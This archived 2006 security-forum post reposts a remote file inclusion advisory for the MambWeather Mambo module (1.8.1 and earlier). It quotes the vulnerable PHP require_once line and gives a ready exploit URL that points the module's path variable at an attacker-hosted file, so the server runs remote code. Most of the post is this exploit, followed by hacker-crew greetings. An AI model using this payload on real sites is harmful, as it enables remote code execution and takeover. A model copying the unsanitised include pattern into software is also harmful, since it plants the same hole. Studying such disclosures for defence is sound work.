邪恶八进制信息安全团队技术讨论组's Archiver

pub!1c 2006-10-23 12:58

MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability

[code]
Bug Found by h4ntu [[url]http://h4ntu.com[/url]] #batamhacker crew
Another Mambo module remote inclusion vulneribility

download : [url]http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip[/url]

bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php

<?php

/**
* Base plugin class.
*/
global $mosConfig_absolute_path;

require_once $mosConfig_absolute_path.&#39;/modules/MambWeather/Savant2/Plugin.php&#39;;

/**

exploit:

http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]

Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet



[/code]

页: [1]
© 1999-2008 EvilOctal Security Team